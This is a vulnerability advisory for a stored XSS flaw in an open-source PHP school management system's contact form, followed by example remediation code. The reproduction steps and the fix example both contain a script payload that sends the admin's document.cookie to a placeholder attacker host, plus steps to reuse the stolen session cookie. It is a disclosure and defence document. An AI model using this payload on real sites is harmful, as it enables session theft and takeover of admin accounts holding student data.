====================================================
School Management System PHP - Stored XSS leading to Admin Account Takeover
====================================================
Author: Mehmet Utku Köken
Date: 2026-04-28
CVE: N/A
Vendor Homepage: https://github.com/codingWithElias/school-management-system-php
Version: 1.0.0 (commit f1ac334)
Tested on: Windows 10 / XAMPP / PHP 8.x
Category: Webapps
Platform: PHP

== Description ==

A Stored Cross-Site Scripting (XSS) vulnerability exists in
School Management System PHP. The contact form located at
/req/contact.php fails to sanitize the full_name and message
parameters before storing them in the database. When an
administrator views the messages panel at /admin/message.php,
the stored payload executes within the admin's browser context.
This allows an unauthenticated attacker to steal the admin
session cookie and perform a full account takeover.

== Affected Parameters ==

- full_name
- message

== Affected Files ==

- /req/contact.php (unsanitized input stored)
- /admin/message.php (payload execution)

== Steps to Reproduce ==

1. Navigate to the contact form:

   http://TARGET/school-management-system-php/

2. Intercept the POST request and inject the payload
   into the full_name or message parameter:

   POST /school-management-system-php/req/contact.php HTTP/1.1
   Host: TARGET
   Content-Type: application/x-www-form-urlencoded

   [email protected]&full_name=<script>new Image().src='http://ATTACKER:8888/?c='+document.cookie</script>&message=hello

3. Start a listener on the attacker machine:

   python3 -m http.server 8888

4. Wait for the administrator to visit the messages panel:

   http://TARGET/school-management-system-php/admin/message.php

5. The attacker's listener receives the admin session cookie:

   GET /?c=PHPSESSID=ao7emtlus8bf87dkpumutl4v3q HTTP/1.1

6. Use the captured session cookie to access the admin panel
   without credentials by setting:

   Cookie: PHPSESSID=ao7emtlus8bf87dkpumutl4v3q

   Then navigate to:

   http://TARGET/school-management-system-php/admin/

== Impact ==

An unauthenticated attacker can submit a malicious payload
via the public contact form. Once the administrator views
the messages, the attacker receives the admin PHPSESSID and
gains full administrative access to the application including
student records, teacher data and system configuration.
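
== Remediation Example ==

The two weaknesses chained above are missing output encoding in
/admin/message.php and a session cookie that JavaScript can read.
The following PHP is an added example written for this advisory,
not code from the project; it shows how the contact handler and
the messages panel could be written so the stored payload is
rendered as text rather than executed, and how the admin session
cookie can be kept out of document.cookie. The table name
`messages`, the `$pdo` handle and all function names are
assumptions and do not correspond to the project's real code.

```php
<?php
declare(strict_types=1);

// ---- /req/contact.php side: validate, then store with a prepared statement ----
// Storage keeps the raw text; HTML encoding is applied at output time so the
// data stays usable for other consumers (e-mail, CSV export, etc.).
function validate_contact(array $post): array {
    $name = trim((string)($post['full_name'] ?? ''));
    $msg  = trim((string)($post['message'] ?? ''));
    $errors = [];
    if ($name === '' || mb_strlen($name) > 100) {
        $errors[] = 'full_name must be 1-100 characters';
    }
    if ($msg === '' || mb_strlen($msg) > 2000) {
        $errors[] = 'message must be 1-2000 characters';
    }
    return [$errors, $name, $msg];
}

function store_contact(PDO $pdo, string $name, string $msg): void {
    // Hypothetical table/columns; parameter binding also removes SQL injection risk.
    $stmt = $pdo->prepare('INSERT INTO messages (full_name, message) VALUES (:n, :m)');
    $stmt->execute([':n' => $name, ':m' => $msg]);
}

// ---- /admin/message.php side: encode every value on output ----
function e(string $s): string {
    // ENT_QUOTES covers attribute contexts, ENT_SUBSTITUTE avoids returning ''
    // on invalid UTF-8 (which would silently drop a message from the panel).
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_messages(array $rows): string {
    $html = '<table>';
    foreach ($rows as $r) {
        $html .= '<tr><td>' . e($r['full_name']) . '</td>'
               . '<td>' . nl2br(e($r['message'])) . '</td></tr>';
    }
    return $html . '</table>';
}

// ---- admin bootstrap: session cookie not readable by script, plus a CSP ----
function start_hardened_session(): void {
    session_set_cookie_params([
        'httponly' => true,   // document.cookie no longer exposes PHPSESSID
        'secure'   => true,   // cookie only sent over HTTPS
        'samesite' => 'Lax',
    ]);
    session_start();
    // Defence in depth: inline <script> blocks are refused even if an
    // encoding bug slips through somewhere else in the admin panel.
    header("Content-Security-Policy: default-src 'self'");
}

// Usage with a constructed row shaped like the advisory's payload.
// In the real panel $rows would come from a SELECT on the messages table.
$rows = [
    ['full_name' => "<script>new Image().src='http://ATTACKER:8888/?c='+document.cookie</script>",
     'message'   => "hello"],
];
echo render_messages($rows);
```

With this rendering the row appears in the admin panel as the
literal text of the tag, and because the cookie is HttpOnly the
exfiltration step in the proof of concept would receive nothing
even if a script did run. Regenerating the session ID with
session_regenerate_id(true) at login further limits the value of
any cookie that is captured before the fix is deployed.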

== References ==

https://owasp.org/www-community/attacks/xss/
https://github.com/codingWithElias/school-management-system-php